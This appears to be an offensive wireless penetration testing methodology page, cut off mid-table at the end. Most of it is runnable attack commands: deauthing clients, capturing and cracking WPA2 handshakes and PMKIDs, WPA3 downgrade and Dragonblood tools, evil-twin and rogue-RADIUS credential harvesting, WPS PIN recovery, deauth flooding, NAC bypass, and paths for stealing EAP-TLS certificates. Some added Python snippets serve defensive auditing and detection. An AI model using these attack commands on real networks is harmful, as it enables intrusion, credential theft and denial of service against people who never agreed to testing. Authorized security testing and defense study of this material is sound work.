# Wireless / 802.11 — Offensive Testing Methodology
## Quick Workflow
- Pick the right adapter (monitor mode + injection + correct band/PHY for target)
- Recon airspace passively — never deauth before you know the topology
- Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
- Crack offline; do not rely on online dictionary attacks
- If WPA-Enterprise, pivot through stolen creds or rogue RADIUS
## Hardware & Adapter Selection
| Chipset | Strengths | Notes |
|---|---|---|
| Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only |
| Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: aircrack-ng/rtl8812au |
| MediaTek MT7612U (AWUS036ACM) | Stable dual-band | Modern kernels in-tree |
| MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required |
| AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release |
```bash
# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"
```
## Reconnaissance
```bash
# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg
# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
# Hidden SSID — wait for a client probe, or force a reconnect with a targeted deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon
# Kismet for war-driving (WiGLE uploads)
kismet -c wlan0mon
```
Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.
## WPA / WPA2-PSK
### Four-way Handshake Capture
```bash
# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
```
Verify the EAPOL frames are usable by converting them to hashcat's 22000 format:
```bash
hcxpcapngtool -o hash.hc22000 handshake-01.cap
```
### PMKID (No Client Required)
The PMKID is carried in the first message of the four-way handshake (AP to station), so it can be captured with no client connected.
```bash
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
    --enable_status=1 --filterlist_ap=targets.txt --filtermode=2
# option names changed between hcxdumptool major versions; check --help for your build
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
```
### Cracking
```bash
# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule
# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -
```
## WPA3 / SAE
### Transition-Mode Downgrade
If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.
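Survey check for the items recorded during recon (AKM/cipher suites, PMF status) and for the transition mode described above: an added example, not from the original page, that parses the RSN information element from a beacon or probe response. The sample IE bytes are constructed.

```python
import struct
# Parser for the 802.11 RSN information element (ID 48) as carried in beacons
# and probe responses. Added example, not from the page; SAMPLE_TRANSITION is
# constructed, not captured from a real network.
OUI = b"\x00\x0f\xac"
AKM_NAMES = {1: "802.1X", 2: "PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256",
             8: "SAE", 9: "FT-SAE", 12: "Suite-B-192"}
CIPHER_NAMES = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
                8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}

def _suite(buf, off, names):
    """Decode one 4-byte suite selector (OUI + type)."""
    oui, typ = buf[off:off + 3], buf[off + 3]
    return names.get(typ, f"unknown-{typ}") if oui == OUI else f"vendor-{oui.hex()}-{typ}"

def parse_rsn(ie: bytes) -> dict:
    """Parse the body of an RSN IE (bytes after the ID and length octets)."""
    version, = struct.unpack_from("<H", ie, 0)
    if version != 1:
        raise ValueError(f"unsupported RSN version {version}")
    group = _suite(ie, 2, CIPHER_NAMES)
    off = 6
    n_pair, = struct.unpack_from("<H", ie, off); off += 2
    pairwise = [_suite(ie, off + 4 * i, CIPHER_NAMES) for i in range(n_pair)]
    off += 4 * n_pair
    n_akm, = struct.unpack_from("<H", ie, off); off += 2
    akm = [_suite(ie, off + 4 * i, AKM_NAMES) for i in range(n_akm)]
    off += 4 * n_akm
    # RSN capabilities field is optional; bit 6 = MFPR, bit 7 = MFPC (802.11w)
    caps = struct.unpack_from("<H", ie, off)[0] if len(ie) >= off + 2 else 0
    return {"group": group, "pairwise": pairwise, "akm": akm,
            "mfpr": bool(caps & 0x40), "mfpc": bool(caps & 0x80)}

def survey_findings(rsn: dict) -> list:
    """Weaknesses a survey should record for this BSS."""
    findings = []
    akm = set(rsn["akm"])
    if akm & {"PSK", "PSK-SHA256"} and akm & {"SAE", "FT-SAE"}:
        findings.append("transition mode: PSK and SAE both offered, WPA2 downgrade possible")
    if "TKIP" in rsn["pairwise"] or rsn["group"] == "TKIP":
        findings.append("TKIP enabled")
    if not rsn["mfpr"]:
        findings.append("PMF optional" if rsn["mfpc"] else "PMF unsupported: deauth frames unprotected")
    return findings

# Constructed sample: CCMP group + pairwise, AKM = PSK and SAE, MFPC set, MFPR clear
SAMPLE_TRANSITION = bytes.fromhex("0100" "000fac04" "0100" "000fac04"
                                  "0200" "000fac02" "000fac08" "8000")
```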
### Dragonblood (CVE-2019-9494/9495/13377)
Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) derives the password element in non-constant time and leaks information about it via timing/cache side channels.
```bash
# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
```
### SAE Auth Flooding (Resource Exhaustion)
```bash
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments
```
## WPA-Enterprise (802.1X / EAP)
### Method Identification
```bash
# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V
```
| Inner Method | Attack |
|---|---|
| EAP-MSCHAPv2 (PEAP/TTLS) | Crack NetNTLMv1-style challenge offline |
| EAP-GTC | Cleartext password — capture via rogue RADIUS |
| EAP-TLS | Steal client cert (often in user keychain / DPAPI / NDES) |
| EAP-PWD | Dragonblood-class side channels |
### Evil-Twin RADIUS (MSCHAPv2 / GTC)
```bash
# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
    --auth wpa-eap --creds
# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt
```
Critical: organizations whose supplicants do not validate the RADIUS server certificate and pin its CN/SAN are vulnerable. Windows 10/11 clients with ServerValidation disabled (common for BYOD) will hand their credentials to a rogue RADIUS server.
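Supplicant-side audit for the pinning problem just described: an added example, not from the page, that walks wpa_supplicant.conf network blocks and flags WPA-EAP profiles with no CA certificate or no server-name match. The two sample profiles are constructed.

```python
import re
# Audits wpa_supplicant.conf network={...} blocks for WPA-EAP profiles that do
# not pin the RADIUS server certificate. Added example, not from the page;
# SAMPLE_CONF is constructed.
_BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
_NAME_KEYS = ("domain_match", "domain_suffix_match", "subject_match", "altsubject_match")

def parse_networks(conf: str) -> list:
    """Return one dict of key/value pairs per network={...} block."""
    nets = []
    for body in _BLOCK_RE.findall(conf):
        net = {}
        for line in body.splitlines():
            line = line.strip()
            if line.startswith("#") or "=" not in line:
                continue
            k, v = line.split("=", 1)
            net[k.strip()] = v.strip().strip('"')
        nets.append(net)
    return nets

def audit_eap(net: dict) -> list:
    """Findings for one profile; an empty list means the server is pinned."""
    if "WPA-EAP" not in net.get("key_mgmt", ""):
        return []                      # PSK/SAE profiles are out of scope here
    findings = []
    if not (net.get("ca_cert") or net.get("ca_path")):
        findings.append("no ca_cert/ca_path: any RADIUS certificate is accepted")
    if not any(net.get(k) for k in _NAME_KEYS):
        findings.append("no domain/subject match: any cert from the CA is accepted")
    if findings and "MSCHAPV2" in net.get("phase2", "").upper():
        findings.append("MSCHAPv2 inner auth: rogue RADIUS gets a crackable challenge/response")
    return findings

SAMPLE_CONF = """
network={
    ssid="CorpWiFi-BYOD"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""
```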
### EAP-TLS Cert Theft Paths
- DPAPI master key + cert blob from the user profile (%APPDATA%\Microsoft\SystemCertificates)
- NDES misconfig (ESC8-class cert request abuse)
- ADCS user auto-enrollment template with weak ACL
## WPS
### Pixie Dust (Offline)
```bash
# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
```
Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.
### Online PIN Brute (Last Resort)
```bash
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy
```
## Evil Twin / KARMA / Mana
### Stock Evil Twin (Captive Portal)
```bash
# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd
# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon
```
### KARMA / Mana (Probe Exploitation)
Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.
```bash
# hostapd-mana
sudo hostapd-mana ./mana.conf
# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
    --auth wpa-eap --creds --hostile-portal
```
### MAC Randomization Defeat
iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.
## KRACK & FragAttacks
| Attack | Class | Target |
|---|---|---|
| KRACK (CVE-2017-13077..082) | Key reinstallation | Unpatched WPA2 supplicants |
| FragAttacks (CVE-2020-24586..588) | Fragmentation/aggregation | Most pre-2021 implementations |
Test a network's patch status:
```bash
# Vanhoef test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
./krack-test-client.py
git clone https://github.com/vanhoefm/fragattacks
./test-fragattacks.py wlan0
```
## Deauth / Disassociation Attacks
```bash
# Single client deauth (use for handshake capture)
aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon
# Broadcast (DoS — only with explicit authorization)
mdk4 wlan0mon d -B target_bssids.txt
# Disassoc + auth flood combo (kicks then prevents reconnect)
mdk4 wlan0mon a -a AP_BSSID -m
```
802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.
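Detection side of this section, as an added example that is not part of the original page: a sliding-window counter over raw 802.11 management frames that flags unprotected broadcast deauths and deauth/disassoc bursts per BSSID, the same signal a WIDS or Kismet's deauth-flood alert keys on. The window, threshold, timestamps and the two sample frames are constructed assumptions.

```python
import struct
from collections import defaultdict
# Deauth/disassoc flood detector over raw 802.11 management frames. Added
# example, not from the page; window, threshold and sample frames are assumptions.
DEAUTH, DISASSOC = 0x0C, 0x0A
BROADCAST = "ff:ff:ff:ff:ff:ff"

def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame: bytes) -> dict:
    """Decode the 24-byte management MAC header plus the 2-byte reason code."""
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 0:                      # frame type 0 = management
        raise ValueError("not a management frame")
    reason = struct.unpack_from("<H", frame, 24)[0] if len(frame) >= 26 else None
    return {"subtype": fc0 >> 4, "protected": bool(fc1 & 0x40),   # 802.11w bit
            "dst": _mac(frame[4:10]), "src": _mac(frame[10:16]),
            "bssid": _mac(frame[16:22]), "reason": reason}

def detect_flood(frames, window_s=5.0, threshold=10) -> list:
    """frames: iterable of (timestamp, raw_bytes). Returns alert strings."""
    seen = defaultdict(list)        # bssid -> timestamps of recent kick frames
    alerts = []
    for ts, raw in frames:
        f = parse_mgmt(raw)
        if f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        if f["dst"] == BROADCAST and not f["protected"]:
            alerts.append(f"{ts:.2f} unprotected broadcast deauth/disassoc from {f['bssid']}")
        bucket = seen[f["bssid"]]
        bucket.append(ts)
        while ts - bucket[0] > window_s:            # slide the window
            bucket.pop(0)
        if len(bucket) == threshold:                # alert once per burst
            alerts.append(f"{ts:.2f} {threshold} kick frames from {f['bssid']} within {window_s}s")
    return alerts

# Constructed frames (as a monitor-mode capture would show them): unicast deauth
# AP -> STA with reason code 7, and one broadcast deauth from the same BSSID.
_UNICAST = bytes.fromhex("c000" "3a01" "112233445566" "aabbccddeeff" "aabbccddeeff" "0000" "0700")
_BCAST = bytes.fromhex("c000" "3a01" "ffffffffffff" "aabbccddeeff" "aabbccddeeff" "0000" "0700")
SAMPLE_CAPTURE = [(i * 0.2, _UNICAST) for i in range(12)] + [(3.0, _BCAST)]
```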
## 802.1X / Wired NAC Bypass (Adjacent)
```bash
# Sniff valid 802.1X exchange on wired side
tcpdump -i eth0 -w nac.pcap ether proto 0x888e
# silentbridge / nac_bypass — transparently bridge through an authenticated host
git clone https://github.com/s0lst1c3/silentbridge
silentbridge --takeover --phy wlan0  # variants for wired
```
## Wi-Fi 6 / 6E / 7 Considerations
- 6 GHz (Wi-Fi 6E) disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec.
- OFDMA / MU-MIMO: legacy injection often misaligns with RU allocations — verify packet delivery on test bench.
- TWT (Target Wake Time): deauth windows differ; observe BA sessions before injecting.
- MLO (Wi-Fi 7): a single client over multiple links — capture must cover all links to recover full session.
## Sidebands & Adjacent Wireless
| Tech | Tool | Notes |
|---|---|---|
| Bluetooth Classic | redfang, crackle, btproxy | LMP/L2CAP fuzzing |
| BLE | bettercap, Sniffle (TI CC1352), Frontline | GATT enumeration, LE Secure Connections downgrade |
| Zigbee / 802. |